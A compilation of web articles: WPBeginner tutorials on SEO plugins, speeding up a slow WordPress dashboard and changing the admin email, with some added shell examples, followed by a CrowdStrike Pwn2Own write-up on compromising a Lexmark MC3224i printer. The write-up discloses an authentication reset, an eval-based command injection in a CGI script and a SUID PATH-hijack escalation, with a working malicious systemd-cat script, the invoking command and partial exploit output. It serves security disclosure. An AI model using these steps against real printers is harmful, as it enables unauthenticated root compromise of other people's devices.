It provides SEO related information for any website. This data includes page health, age, last updated, Alexa rank, and many other parameters. It is one of the most downloaded browser addons by SEO professionals.

Apart from that, the SEOQuake toolbar can show you the same data for search results when you type in a keyword. This information can be extremely useful if you are gauging competition for different keywords. You can even download search results in CSV format and prepare your own Excel sheets of search data.

Alternative: Ahrefs SEO Toolbar

Bonus Plugins for WordPress Website Owners

These tools give you an additional advantage when optimizing your website for SEO. They do not advertise themselves as SEO tools, but they are essential for every website and play a significant role in your website’s search performance.

13. WP Rocket

WP Rocket WordPress Caching Plugin

Site speed is a major factor in search rankings. That’s why you need to monitor your website speed & performance to make sure it’s not affecting your SEO.

The easiest way to boost your website speed is by enabling caching. WP Rocket is the best WordPress caching plugin on the market, which allows you to set up caching without diving into any technical stuff.

Alternative: WP Super Cache

14. MonsterInsights

MonsterInsights

Many beginners rely on their best guess to make their marketing decisions. You don’t need to do that when you can easily get the insights you need to improve your website’s SEO strategy.

MonsterInsights is the best Google Analytics plugin for WordPress. It allows you to easily install Google Analytics in WordPress and shows human-readable reports inside your WordPress dashboard.

It tells you where your users are coming from, your top content, what users do on your website, and more. It also allows you to track your eCommerce SEO by seeing which products are popular and where you are losing customers.

Bonus tip: See what other marketing data you must track on your website to grow your business.

Other Powerful Growth Tools:

Aside from the above plugins, we also recommend the following tools to increase your traffic and conversions from SEO visitors:

  • PushEngage – connect and engage with SEO visitors after they leave your website with web push notifications.
  • OptinMonster – convert abandoning visitors into email subscribers & customers.
  • Constant Contact – stay in touch with SEO visitors through email marketing.
  • WPForms – get more leads from your SEO traffic with the #1 WordPress form builder.
  • SeedProd – create SEO friendly custom landing pages with drag & drop WordPress page builder (no coding needed).

We hope this article helped you find the best WordPress SEO plugins and tools for your website. You may also want to see our proven tips to easily increase your website traffic, and our comparison of best chatbot software to boost conversions.

Source:
https://www.wpbeginner.com/showcase/9-best-wordpress-seo-plugins-and-tools-that-you-should-use/

How to Fix a Slow Loading WordPress Dashboard (Step by Step)

Is your WordPress dashboard loading too slow?

Having a slow loading WordPress dashboard is annoying, and it hurts overall productivity when it comes to creating content and managing your website. The underlying cause of a slow WordPress dashboard can also impact your website conversions.

In this article, we’ll show you how to easily fix a slow loading WordPress dashboard, step by step.

Fixing a slow loading WordPress admin area

What Causes a Slow Loading WordPress Dashboard?

A slow loading WordPress dashboard can be caused by a number of reasons, but the most common one is limited server resources.

Most WordPress hosting providers offer a set number of resources for each hosting plan. These resources are enough to run most websites.

However, as your WordPress website grows, you may notice slight performance degradation or slower loading across the board. That’s because more people are now accessing your website and consuming server resources.

For the front end of your website, which is what your visitors see, you can easily install a WordPress caching plugin to overcome WordPress speed and performance issues.

However, the WordPress admin area is uncached, so it requires more resources to run at the optimal level.

If your WordPress dashboard has become annoyingly slow, then this means a WordPress plugin, a default setting, or something else on the site is consuming too many resources.

That being said, let’s take a look at how to troubleshoot and fix the slow loading WordPress admin dashboard.

Here is an overview of the steps we’ll cover in this article.

1. How to Test Performance of WordPress admin area

Before making any changes, it’s important to measure the speed of your WordPress admin area, so you can get an objective measurement of any improvement.

Normally, you can use website speed test tools to check your website’s speed and performance.

However, the WordPress admin area is behind a login screen, so you cannot use the same tools to test it.

Luckily, many modern desktop browsers come with built-in tools to test the performance of any web page you want.

For example, if you’re using Google Chrome, then you can simply go to the WordPress dashboard and open the Inspect tool by right-clicking anywhere on the page.

Lighthouse to test performance

This will split your browser screen and you will see the Inspect area in the other window either at the bottom or side of your browser window.

Inside the Inspect tool, switch to the Lighthouse tab and click on the Generate Report button.

This will generate a report similar to the Web Vitals report generated by Page Speed Insights.

Performance results

From here, you can see what’s slowing down your WordPress admin area. For instance, you can see which JavaScript files are taking up more resources and affecting your server’s initial response time.

2. Install WordPress Updates

The core WordPress team works hard on improving performance with each WordPress release.

For instance, the block editor team tests and improves performance in each release. The performance team works on improving speed and performance across the board.

If you are not installing WordPress updates, then you are missing out on these performance improvements.

Similarly, all top WordPress themes and plugins release updates that not only fix bugs but also address performance issues.

To install updates, simply go to Dashboard » Updates page to install any available updates.

WordPress updates

For more details, see our guide on how to properly update WordPress (infographic).

3. Update the PHP Version Used by Your Hosting Company

WordPress is developed using an open-source programming language called PHP. At the time of writing this article, WordPress requires at least PHP version 7.4 or greater. The current stable version available for PHP is 8.1.6.

Most WordPress hosting companies maintain the minimum requirements to run WordPress, which means they may not be using the latest PHP version out of the box.

Now, just like WordPress, PHP also releases new versions with significant performance improvements. By using an older version, you are missing that performance boost.

You can view which PHP version is used by your hosting provider by visiting the Tools » Site Health page from your WordPress dashboard and switching to the ‘Info’ tab.

Check PHP version

Luckily, all reliable WordPress hosting providers offer an easy way for customers to upgrade their PHP version.

For instance, if you are on Bluehost, then you can simply log in to your hosting control panel and click on the Advanced tab in the left column.

Multi PHP in Bluehost

From here, you need to click on the MultiPHP Manager icon under the Software section.

On the next page, you need to select your WordPress blog and then select the PHP version that you want to use.

Change PHP version

For other hosting companies, see our complete guide on how to update your PHP version in WordPress.

4. Increase PHP Memory Limit

Your web hosting server is like any other computer. It needs memory to efficiently run multiple applications at the same time.

If there is not enough memory available for PHP on your server, then it would slow down your website and may even cause it to crash.

You can check the PHP memory limit by visiting Tools » Site Health page and switching to the Info tab.

Check PHP memory limit

You’ll find PHP memory limit under the Server section. If it is less than 500M, then you need to increase it.

You can increase PHP memory limit by simply entering the following line in your wp-config.php file.

define( 'WP_MEMORY_LIMIT', '512M' );

For more details, see our article on increasing the PHP memory limit in WordPress.

5. Monitor WordPress Plugins for Performance

Some WordPress plugins may run inside the WordPress admin area. If plugin authors are not careful, their plugins can easily consume too many resources and slow down your WordPress admin area.

One way to find out about such plugins is by installing and activating the Query Monitor plugin. For more details, see our step by step guide on how to install a WordPress plugin.

Upon activation, the plugin will add a new menu item to your WordPress toolbar.

Query Monitor tab

Clicking on it will show performance results for the page you are currently viewing on your website.

This will bring up the Query Monitor console.

Here you need to switch to the ‘Queries by Component’ tab on the left side. From here, you can see the performance impact of plugins and find out which one is taking up too many resources.

Query Monitor results

You can now temporarily disable the slow plugins and see if that improves performance.

If it does, then you can reach out to the plugin author and seek support, or find an alternative plugin.

6. Install a WordPress Caching Plugin

WordPress caching plugins not only improve your website speed, but they can also help you fix a slow loading admin dashboard.

A good WordPress caching plugin helps you optimize page load speed, CSS and JavaScript delivery, your WordPress database, and more.

This frees up resources on your WordPress hosting server that your WordPress admin area can utilize for improved performance.

We recommend using WP Rocket. It is the best WordPress caching plugin on the market. It works out of the box and makes it super easy to optimize your WordPress performance.

WP Rocket dashboard

For more details, see our guide on how to properly install and set up WP Rocket in WordPress.

7. Tweak Admin Screens & Disable WordPress Dashboard Widgets

WordPress automatically loads some widgets on the dashboard screen. This includes Quick Draft, Events and News, Site Health, and more.

Some WordPress plugins add their own widgets to the dashboard screen as well. If you have a lot of these widgets loading on your dashboard, it could slow things down.

You can turn off these widgets by simply clicking on the Screen Options button and unchecking the box next to the widgets.

Screen Options to remove unnecessary widgets

Similarly, you can use the Screen Options menu to show and hide sections on different admin screens.

For instance, you can choose the columns you want to see on the posts screen.

Clean up posts screen

8. Fix Slow WooCommerce Admin Dashboard

If you run an online store using WooCommerce, then there are some specific WooCommerce features that can affect the performance of your WordPress admin area.

For instance, you can turn off the WooCommerce dashboard widget by clicking on the Screen Options menu.

Similarly, you can change the information displayed on the Products page.

Products page

After a while, your WooCommerce store may add unnecessary data to your WordPress database.

If you are already using WP Rocket, then you can simply switch to the Database tab under plugin settings. From here, you can delete transients and optimize your WordPress database with a click.

Database optimize

9. Lock WordPress Admin Area and Login Pages

Random hackers and DDoS attacks are common internet nuisances that can affect WordPress websites.

These automated scripts access WordPress login pages and attempt to login hundreds of times in a short amount of time.

They may not be able to gain access to your WordPress website, but they would still be able to slow it down.

One easy way to block these scripts is by locking your WordPress admin directory and login pages.
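Before locking the login page down, it is worth confirming from the web server’s access log that automated login attempts are actually what is consuming resources. The following is an added example, not part of the original article: a small POSIX shell script that counts failed POSTs to wp-login.php per client address over constructed sample log lines (documentation IP addresses, combined log format). The threshold value is a placeholder to tune for your own site.

```shell
#!/bin/sh
# Added example (not from the original article): spot automated login attempts
# against wp-login.php in a combined-format access log. The log lines below are
# constructed sample data using documentation IP addresses; the threshold is a
# placeholder you would tune for your own site.

# Four failed POSTs from one address, one successful login (302 redirect) from
# another, and ordinary page traffic.
SAMPLE_LOG='203.0.113.7 - - [10/May/2022:10:01:01 +0000] "POST /wp-login.php HTTP/1.1" 200 1234
203.0.113.7 - - [10/May/2022:10:01:02 +0000] "POST /wp-login.php HTTP/1.1" 200 1234
203.0.113.7 - - [10/May/2022:10:01:03 +0000] "POST /wp-login.php HTTP/1.1" 200 1234
203.0.113.7 - - [10/May/2022:10:01:04 +0000] "POST /wp-login.php HTTP/1.1" 200 1234
198.51.100.9 - - [10/May/2022:10:02:00 +0000] "GET /wp-login.php HTTP/1.1" 200 2048
198.51.100.9 - - [10/May/2022:10:02:05 +0000] "POST /wp-login.php HTTP/1.1" 302 0
192.0.2.20 - - [10/May/2022:10:03:00 +0000] "GET /blog/ HTTP/1.1" 200 5120'

# failed_logins_by_ip THRESHOLD   (reads the access log on stdin)
# A POST to wp-login.php answered with 200 is a failed login (WordPress re-renders
# the form with an error); a successful login answers with a 302 redirect to wp-admin.
# Prints "IP COUNT" for every client address with at least THRESHOLD failed attempts.
failed_logins_by_ip() {
  awk -v t="$1" '
    $6 == "\"POST" && $7 ~ /^\/wp-login\.php/ && $9 == "200" { failed[$1]++ }
    END { for (ip in failed) if (failed[ip] >= t) printf "%s %d\n", ip, failed[ip] }
  ' | sort
}

# flag_sample_ips [THRESHOLD] runs the check over the constructed sample log.
flag_sample_ips() {
  printf '%s\n' "$SAMPLE_LOG" | failed_logins_by_ip "${1:-3}"
}

flag_sample_ips 3
```

On a real server you would run `failed_logins_by_ip 20 < /var/log/apache2/access.log` (path is an assumption; adjust for your host). If the site sits behind a CDN or reverse proxy, the first field will be the proxy’s address rather than the client’s, so key the count on the forwarded client address your server logs instead.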

If you are on Bluehost, then you can simply go to your hosting control panel and switch to the Advanced Tab. From here, you need to click on the Directory Privacy icon.

Directory Privacy

Next, you need to locate the wp-admin directory (usually found inside the public_html folder).

Then simply click on the Edit button next to it.

WordPress admin folder

Next, you will be asked to provide a name for your protected directory.

Name folder

Click on the Save button to continue. The control panel will save your options and you’ll need to click on the Go Back button to continue.

After that, you will need to create a username and password for the protected folder.

Create username and password

Now, when you visit your WordPress admin area, you will be prompted to enter the username and password.

Login prompt

For more details, see our tutorial on how to password protect the WordPress admin directory.

Password Protect WordPress Login Page

Next, you will want to block access to the WordPress login page. For this, you’ll need to manually edit the .htaccess file on your website and generate a password file.

First, connect to your WordPress website using an FTP client or the File Manager app inside your hosting control panel.

After that, go to the root folder of your website (the root folder is where you can see the wp-admin, wp-includes, and wp-content folders).

Here you need to create a new file and name it .htpasswd.

Create htpasswd file

Next, you need to visit this online tool to generate a .htpasswd string.

You need to use the same username and password that you used for the WordPress admin directory.

Then click on the Generate button.

Generate password

The tool will generate a username and password string under the output box.

You need to copy and paste this string inside the .htpasswd file you created earlier.

Next, you need to edit the .htaccess file and copy and paste the following code inside it.

### BEGIN BASIC BLOCK
<Files wp-login.php>
AuthType Basic
AuthName "Protected Folder"
AuthUserFile /home/username/public_html/yourwebsite/.htpasswd
Require user jsmith
Satisfy All
</Files>
### END BASIC BLOCK

Don’t forget to replace jsmith with your own username and change AuthUserFile value with the path to your .htpasswd file. You can find it inside the File Manager app.

You can now visit your WordPress login page to see the password protection in action.
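The same setup from the command line, as an added example that is not part of the original article: the .htpasswd entry is generated locally with openssl (so the password is never typed into a third-party website), a check function re-hashes a password with the stored salt the way Apache does, and the .htaccess block is the one shown above. The username jsmith, the password values and the AuthUserFile path are placeholders.

```shell
#!/bin/sh
# Added example (not from the original article). Generates an Apache .htpasswd
# entry locally with openssl instead of an online generator, verifies a password
# against such an entry, and prints the .htaccess block from the article.
# jsmith, the passwords and the file path are placeholders.

# make_htpasswd_entry USER PASSWORD -> prints "USER:$apr1$SALT$HASH"
# ($apr1$ is the Apache MD5-crypt format every Apache version understands.)
make_htpasswd_entry() {
  user=$1; pass=$2
  hash=$(openssl passwd -apr1 "$pass") || return 1
  printf '%s:%s\n' "$user" "$hash"
}

# check_htpasswd_entry USER PASSWORD ENTRY -> exit 0 if PASSWORD matches ENTRY.
# Mirrors Apache: take the salt out of the stored hash, re-hash, compare.
check_htpasswd_entry() {
  user=$1; pass=$2; entry=$3
  stored_user=${entry%%:*}
  stored_hash=${entry#*:}
  [ "$stored_user" = "$user" ] || return 1
  # "$apr1$SALT$HASH" split on '$' gives fields "", apr1, SALT, HASH
  salt=$(printf '%s' "$stored_hash" | cut -d'$' -f3)
  recomputed=$(openssl passwd -apr1 -salt "$salt" "$pass") || return 1
  [ "$recomputed" = "$stored_hash" ]
}

# make_htaccess_block USER HTPASSWD_PATH -> prints the <Files> block for wp-login.php
make_htaccess_block() {
  user=$1; passfile=$2
  cat <<EOF
### BEGIN BASIC BLOCK
<Files wp-login.php>
AuthType Basic
AuthName "Protected Folder"
AuthUserFile $passfile
Require user $user
Satisfy All
</Files>
### END BASIC BLOCK
EOF
}

# Demo with constructed placeholder values.
entry=$(make_htpasswd_entry jsmith 'change-me-example')
echo "$entry"
make_htaccess_block jsmith /home/username/public_html/yourwebsite/.htpasswd
```

Append the printed entry to the .htpasswd file and paste the printed block into .htaccess, as described above. Keep the .htpasswd file outside the web root where possible, and use the same username and password as for the wp-admin directory so the browser only prompts once.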

10. Manage WordPress Autosave Intervals

The WordPress block editor comes with built-in autosave feature. It allows you to easily restore your content in case you close the editor without saving your changes.

However, if multiple users are working on your website during peak traffic, then all those autosave requests will slow down WordPress admin area.

Now autosave is a crucial feature and we don’t recommend turning it off. However, you can slow it down to reduce the performance impact.

Simply add the following line to your wp-config.php file.

define( 'AUTOSAVE_INTERVAL', 120 );

This line simply tells WordPress to run autosave once every 2 minutes (120 seconds) instead of 1.

Reduce Heartbeat API Calls

WordPress uses something called the heartbeat API to send Ajax calls to a server without reloading a page. This allows WordPress to show other authors that a post is being edited by another user, and it enables plugin developers to show you notifications in real-time.

By default, the API pings back every 60 seconds. If multiple authors are working on your website at the same time, then these server calls can become resource-intensive.

If you are already using WP Rocket, then it will automatically reduce Heartbeat API activity to one ping every 120 seconds.

Reduce Heartbeat API activity using WP Rocket

Alternatively, you can use their standalone plugin called Heartbeat Control to reduce Heartbeat API calls.

We recommend reducing them to 120 seconds or more.

Heartbeat API calls

11. Upgrade or Switch to Better WordPress Hosting

All WordPress performance issues depend on the infrastructure provided by your WordPress hosting provider.

This limits your ability to improve performance to the resources offered by your hosting provider.

The above tips will certainly help you reduce load on your WordPress server, but it may not be enough for your hosting environment.

To improve performance even more, you can move your WordPress site to a new host and sign up with a different hosting provider.

We recommend using Bluehost, one of the top WordPress hosting companies. Their shared hosting plans come with built-in caching, which improves WordPress performance.

Bluehost Coupon Code

However, as your website grows you may need to upgrade your hosting plan.

High traffic sites would benefit from moving to a managed WordPress hosting platform like WP Engine or SiteGround.

At WPBeginner, we use SiteGround to host our website.

We hope this article helped you learn how to fix a slow loading WordPress dashboard. You may also want to see our complete WordPress security handbook or see our pick of the best WordPress plugins to grow your business.

Source:
https://www.wpbeginner.com/wp-tutorials/how-to-fix-a-slow-loading-wordpress-dashboard/

How to Change the WordPress Admin Email (3 Methods)

Do you want to change the WordPress admin email for your website?

By default, WordPress uses the first email address you provide as your website’s admin email. It is also used as the email address of the first admin account.

In this article, we will show you how to easily change the WordPress admin email address.

Changing WordPress admin email

Why and When You Need to Change The WordPress Admin Email?

Normally, beginners use their personal email address when installing WordPress. Also, some WordPress hosting companies have auto-installers which automatically use your hosting account’s email address during the installation.

This email address is then used by WordPress as the website’s email address as well as the email for the first admin user account.

Your website will use this email address to send important notifications, for example when a new user account is created or an auto-update is installed, and for comment moderation notices.

The admin user’s email address is used to recover a lost password and to receive notifications about the account.

Most website owners soon realize that they want to use a professional business email address instead of generic free email accounts. They may also want to use a different email address for site administration and the admin user.

Having said that, let’s take a look at how to easily change the WordPress admin email address.

Things to Do Before Changing Admin Email Address in WordPress

First, you need to choose the email address you want to use as your WordPress admin email address. You can use a free email service like Gmail or Yahoo. However, this does not look very professional.

Ideally, you would want to use a branded email address using your website’s domain name, for instance info@yourbusinessname.com.

For detailed instructions, see our guide on how to get a free business email address.

Secondly, you’ll need to make sure that you can receive emails from your WordPress website.

Once you change your admin email address, WordPress will send an email to verify the new email address. If you cannot receive emails from your WordPress site, then you will not be able to verify the new admin email address.

To ensure that, you need to install and activate the WP Mail SMTP plugin. For more details, see our step by step guide on how to install a WordPress plugin.

For detailed instructions, see our guide on how to set up WP Mail SMTP with any hosting company.

Now that you are all set, let’s take a look at how to change the WordPress admin email address.

Method 1. Changing WordPress Admin Email Address via Admin Area

This method is simpler and recommended for beginners. In most cases, you will be using this method to change your WordPress site email and your WordPress admin user account’s email address.

To change the WordPress website email address, go to Settings » General and change the ‘Email Address’ option.

Changing WordPress site admin email

Don’t forget to save your changes.

WordPress will now save your new admin email address. However, it will not change the admin email address until you verify the email.

Verify email address

Once you have verified the email address, WordPress will start sending important administration related emails to the new address.

Next, if you want to change the email address of the admin user account, then you need to visit the Users » All Users page and click on the ‘Edit’ link below the user you want to change.

Editing a user account in WordPress

This will open the profile edit page for that particular user account. Simply scroll down to the email option and then change the email address.

Change email address

Don’t forget to click on the ‘Update profile’ button to save your changes.

If you are currently logged in to the user account that you are changing, then WordPress will now send an email notification to the new email address.

You need to click on the link in the email to confirm the change of your email address.

User profile updated

Method 2. Change WordPress Admin Email without Verification (using a Plugin)

If you are unable to get the verification email to change the admin email address, then you can use this method.

It basically allows you to bypass the WordPress verification and directly change the admin email address.

First, you need to install and activate the Change Admin Email plugin. For more details, see our step by step guide on how to install a WordPress plugin.

Upon activation, you need to visit the Settings » General page. Go to the ‘Administration Email Address’ option and enter the new email address you want to use.

Change admin email address without verification

Finally, click on the ‘Save Changes’ button to store your changes.

The plugin will immediately change the admin address without verification. It will also send you a test email to the new admin email address.

Method 3. Change WordPress Admin Email via phpMyAdmin

In this method, we will show you how to change both of these email addresses via phpMyAdmin. This method should only be used when you are unable to access the WordPress admin area.

First, you need to visit the cPanel dashboard on your hosting account. Under the database section, you need to click on the phpMyAdmin icon.

phpMyAdmin in cPanel

Note: Depending on your hosting company, your cPanel dashboard may look slightly different than the above screenshot. We’re using Bluehost, so that’s the screenshot of our control panel.

This will launch the phpMyAdmin app. It is a database management tool, and we will be using it to directly change the admin email address in the WordPress database.

In the phpMyAdmin window, you will see your database listed in the left column. Clicking on it will show you all the tables inside it. You need to locate the _options table and click to open it.

Options table in phpMyadmin

It will now show you the data rows inside the options table. You need to click on the ‘Edit’ button next to the row where option_name is ‘admin_email’.

phpMyAdmin will now open the row in a form where you can just go ahead and change the admin email for your site.

Change site admin email

Don’t forget to click on the ‘Go’ button to save your changes.

You have successfully updated the email address for WordPress website email notifications.

Let’s go ahead and change the email address for the admin user account.

Click to open the _users table in the phpMyAdmin window. Next, click on the ‘Edit’ button next to the row where user_login matches the user you want to edit.

edit user account via phpMyAdmin

phpMyAdmin will now open the user row in a form. You can enter the new email address in the user_email field.

Don’t forget to click on the ‘Go’ button to save your changes.

Troubleshooting

Sometimes WordPress email notifications may never reach your inbox. It is a common issue, and you might be unable to receive password reset or user confirmation emails because of this.

If you are unable to receive WordPress email notifications, then please see our guide on how to fix WordPress not sending email issue.

We hope this article helped you learn how to change the WordPress admin email. You may also want to see our ultimate guide on WordPress user role permissions, and our expert pick of the must have WordPress plugins for all websites.

Source:
https://www.wpbeginner.com/beginners-guide/how-to-change-the-wordpress-admin-email/

For the Common Good: How to Compromise a Printer in Three Simple Steps

In August 2021, ZDI announced Pwn2Own Austin 2021, a security contest focusing on phones, printers, NAS devices and smart speakers, among other things. The Pwn2Own contest encourages security researchers to demonstrate remote zero-day exploits against a list of specified devices. If successful, the researchers are rewarded with a cash prize, and the leveraged vulnerabilities are responsibly disclosed to the respective vendors so they can improve the security of their products.

After reviewing the list of devices, we decided to target the Cisco RV340 router and the Lexmark MC3224i printer, and we managed to identify several vulnerabilities in both of them. Fortunately, we were luckier than last year and were able to participate in the contest for the first time. By successfully exploiting both devices, we won $20,000 USD, which CrowdStrike donated to several charitable organizations chosen by our researchers.

In this blog post, we outline the vulnerabilities we discovered and used to compromise the Lexmark printer.

Overview

Product: Lexmark MC3224
Affected Firmware Versions (without claim for completeness): CXLBL.075.272 (2021-07-29), CXLBL.075.281 (2021-10-14)
Fixed Firmware Version: CXLBL.076.294 (CVE-2021-44735). Note: Users must implement a workaround to address CVE-2021-44736, see Lexmark Security Alert
CVE: CVE-2021-44735 (Shell Command Injection), CVE-2021-44736 (Authentication Reset)
Root Causes: Authentication Bypass, Shell Command Injection, Insecure SUID Binary
Impact: Unauthenticated Remote Code Execution (RCE) as root
Researchers: Hanno Heinrichs, Lukas Kupczyk
Lexmark Resources: https[:]//publications.lexmark[.]com/publications/security-alerts/CVE-2021-44735.pdf
https[:]//publications.lexmark[.]com/publications/security-alerts/CVE-2021-44736.pdf

Step #1: Increasing Attack Surface via Authentication Reset

Before we could start our analysis, we first had to obtain a copy of the firmware. It quickly turned out that the firmware is shipped as an .fls file in a custom binary format containing encrypted data. Luckily, a detailed writeup on the encryption scheme had been published in September 2020. While the writeup did not include code or cryptographic keys, it was elaborate enough that we were able to quickly reproduce it and write our own decrypter. With our firmware decryption tool at hand, we were finally able to peek into the firmware.

It was assumed that the printer would be in a default configuration during the contest and that the setup wizard on the printer had been completed. Thus, we expected the administrator password to be set to an unknown value. In this state, unauthenticated users can still trigger a large number of actions through the web interface. One of these is ‘Sanitize all information on nonvolatile memory’, which can be found under Settings -> Device -> Maintenance. There are several options to choose from when performing that action:

[x] Sanitize all information on nonvolatile memory
  (x) Start initial setup wizard
  ( ) Leave printer offline
[x] Erase all printer and network settings
[x] Erase all shortcuts and shortcut settings

[Start] [Reset]

If the checkboxes are ticked as shown, the process can be initiated through the Start button. The printer’s non-volatile memory will be cleared and a reboot is initiated. This process takes approximately two minutes. Afterward, unauthenticated users can access all functions through the web interface.

Step #2: Shell Command Injection

After resetting the nvram as outlined in the previous section, the CGI script https://target/cgi-bin/sniffcapture_post becomes accessible without authentication. It was previously discovered by browsing the decrypted firmware and is located in the directory /usr/share/web/cgi-bin.

At the beginning of the script, the supplied POST body is stored in the variable data. Afterward, several other variables such as interface, dest, path and filter are extracted and populated from that data by using sed:

read data

remove=${data/*-r*/1}
if [ "x${remove}" != "x1" ]; then
    remove=0
fi
interface=$(echo ${data} | sed -n 's|^.*-i[[:space:]]\([^[:space:]]\+\).*$|\1|p')
dest=$(echo ${data} | sed -n 's|^.*-f[[:space:]]\([^[:space:]]\+\).*$|\1|p')
path=$(echo ${data} | sed -n 's|^.*-f[[:space:]]\([^[:space:]]\+\).*$|\1|p')
method="startSniffer"
auto=0
if [ "x${dest}" = "x/dev/null" ]; then
    method="stopSniffer"
elif [ "x${dest}" = "x/usr/bin" ]; then
    auto=1
fi
filter=$(echo ${data} | sed -n 's|^.*-F[[:space:]]\+\(["]\)\(.*\)\1.*$|\2|p')
args="-i ${interface} -f ${dest}/sniff_control.pcap"

The variable filter is determined by a quoted string following the value -F specified in the POST body. As shown below, it is later embedded into the args variable in case it has been specified along with an interface:

fmt=""
args=""
if [ ${remove} -ne 0 ]; then
    fmt="${fmt}b"
    args="${args} remove 1"
fi
if [ -n "${interface}" ]; then
    fmt="${fmt}s"
    args="${args} interface ${interface}"
    if [ -n "${filter}" ]; then
        fmt="${fmt}s"
        args="${args} filter \"${filter}\""
    fi
    if [ ${auto} -ne 0 ]; then
        fmt="${fmt}b"
        args="${args} auto 1"
    else
        fmt="${fmt}s"
        args="${args} dest ${dest}"
    fi
fi
[...]

At the end of the script, the resulting args value is used in an eval statement:

[...]
resp=""
if [ -n "${fmt}" ]; then
    resp=$(eval rob call system.sniffer ${method} "{${fmt}}" ${args:1} 2>/dev/null)
    submitted=1
[...]

By controlling the filter variable, attackers are therefore able to inject further shell commands and gain access to the printer as uid=985(httpd), which is the user that the web server is executed as.
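As an added example (not code from the CrowdStrike post or from the Lexmark firmware), the following POSIX shell script contrasts the string-concatenation-plus-eval pattern used by sniffcapture_post with an argument-vector invocation, and adds an allowlist check for the filter value. The privileged rob client is replaced by a stand-in that only reports how many arguments reached it; the interface and destination values and the allowlist character set are assumptions.

```shell
#!/bin/sh
# Added example; not code from the CrowdStrike post or the Lexmark firmware.
# It contrasts the string-plus-eval pattern of sniffcapture_post with an
# argument-vector invocation and adds an allowlist check for the filter.
# "rob call system.sniffer" is replaced by rob_stub, which only reports
# how many arguments reached it; interface and dest values are assumed.

rob_stub() {
    # Stand-in for the privileged "rob" client: print the argument count.
    printf '%s\n' "$#"
}

validate_filter() {
    # Allowlist for a capture filter (an assumption for this example):
    # letters, digits, space and a few characters used in pcap expressions.
    # Quotes, semicolons, backticks and "$(" are not in the set, so the value
    # can never terminate the word it is embedded in.
    printf '%s' "$1" | LC_ALL=C grep -Eq '^[A-Za-z0-9 ._:/()=-]+$'
}

argc_via_eval() {
    # Pattern used by the CGI script: the filter is wrapped in quotes inside
    # a string which eval then re-parses. A quote inside the filter closes
    # the word early and the remainder is read as new shell syntax.
    filter=$1
    args=" interface eth0 filter \"${filter}\" dest /tmp"
    # ${args#?} drops the leading space, like ${args:1} in the original.
    eval rob_stub startSniffer ${args#?}
}

argc_via_argv() {
    # Hardened pattern: validate first, then build the argument vector with
    # "set --" and pass it as "$@", so the filter is always one argument.
    filter=$1
    validate_filter "$filter" || { printf 'rejected\n'; return 1; }
    set -- interface eth0 filter "$filter" dest /tmp
    rob_stub startSniffer "$@"
}
```

With a plain filter such as tcp port 80 both paths deliver seven arguments. A filter containing a double quote makes the eval path deliver nine, because the quote ends the filter word and the rest is parsed afresh; the argv path rejects the same input before anything runs, and would pass it through as a single argument even without the allowlist.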

Step #3: Privilege Escalation

The printer ships a custom root-owned SUID binary called collect-selogs-wrapper:

# ls -la usr/bin/collect-selogs-wrapper
-rwsr-xr-x. 1 root root 7324 Jun 14 15:46 usr/bin/collect-selogs-wrapper

In its main() function, the effective user ID (0) is retrieved and the process’s real user ID is set to that value. Afterward, the shell script /usr/bin/collect-selogs.sh is executed:

int __cdecl main(int argc, const char **argv, const char **envp)
{
  __uid_t euid; // r0

  euid = geteuid();
  if ( setuid(euid) )
    perror("setuid");
  return execv("/usr/bin/collect-selogs.sh", (char *const *)argv);
}

Effectively, the shell script is executed as root with UID=EUID, and therefore the shell does not drop privileges. Furthermore, argv[] of the SUID binary is passed to the shell script. As the environment variables are also retained across the execv() call, an attacker is able to specify a malicious $PATH value. Any command inside the shell script that is not referenced by its absolute path can thereby be detoured by the attacker.

The first opportunity for such an attack is the invocation of systemd-cat inside sd_journal_print():

# cat usr/bin/collect-selogs.sh
#!/bin/sh
# Collects fwdebug from the current state plus the last 3 fwdebug files from
# previous auto-collections. The collected files will be archived and compressed
# to the requested output directory or to the standard output if the output
# directory is not specified.

sd_journal_print() {
    systemd-cat -t collect-selogs echo "$@"
}

sd_journal_print "Start! params: '$@'"

[...]

The /dev/shm directory can be used to prepare a malicious version of systemd-cat:

$ cat /dev/shm/systemd-cat
#!/bin/sh
mount -o remount,suid /dev/shm
cp /usr/bin/python3 /dev/shm
chmod +s /dev/shm/python3
$ chmod +x /dev/shm/systemd-cat

This script remounts /dev/shm with the suid flag so that SUID binaries can be executed from it. It then copies the system’s Python interpreter to the same directory and enables the SUID bit on it. The malicious systemd-cat copy can be executed as root by invoking the setuid collect-selogs-wrapper binary like this:

$ PATH=/dev/shm:$PATH /usr/bin/collect-selogs-wrapper

The $PATH environment variable is prepended with the /dev/shm directory that hosts the malicious systemd-cat copy. After executing the command, a root-owned SUID-enabled copy of the Python interpreter is located in /dev/shm:

root@ET788C773C9E20:~# ls -la /dev/shm
drwxrwxrwt    2 root     root           100 Oct 29 09:33 .
drwxr-xr-x   13 root     root          5160 Oct 29 09:31 ..
-rwsr-sr-x    1 root     httpd         8256 Oct 29 09:33 python3
-rw-------    1 nobody   nogroup         16 Oct 29 09:31 sem.netapps.rawprint
-rwxr-xr-x    1 httpd    httpd           96 Oct 29 09:33 systemd-cat

The idea behind this technique is to establish a simple way of escalating privileges without having to exploit the initial collect-selogs-wrapper SUID binary again. We did not use the Bash binary for this, as the version shipped with the printer seems to ignore the -p flag when running with UID!=EUID.

Exploit

An exploit combining the three vulnerabilities to gain unauthenticated code execution as root has been implemented as a Python script. First, the exploit tries to determine whether the printer has a login password set (i.e., the setup wizard has been completed) or is password-less (i.e., the authentication reset was already executed earlier or the setup wizard has not yet been completed). Depending on the result, it decides whether the non-volatile memory reset is required.

If the non-volatile memory reset is triggered, the exploit waits for the printer to finish rebooting. Afterward, it continues with the shell command injection step and escalation of privileges. The privileged access is then used to start an OpenSSH daemon on the printer. To finish, the exploit establishes an interactive SSH session with the printer and hands control over to the user. An example run of the exploit in a testing environment follows:

$ ./mc3224i_exploit.py https://10.64.23.20/ sshd
[*] Probing device...
[+] Firmware: CXLBL.075.281
[+] Acceptable login methods: ['LDAP_DEVICE_REALM', 'LOGIN_METHODS_WITH_CREDS']
[*] Device IS password protected, auth bypass required
[*] Erasing nvram...
[+] Success! HTTP status: 200, rc=1
[*] Waiting for printer to reboot, sleeping 5 seconds...
[*] Checking status...
xxxxxxxxxxxxxxxxxxxxxxx!
[+] Reboot finished
[*] Probing device...
[+] Firmware: CXLBL.075.281
[+] Acceptable login methods: ['LDAP_DEVICE_REALM']
[*] Device IS NOT password protected
[+] Authentication bypass done
[*] Attempting to escalate privileges...
[*] Executing command (root? False):
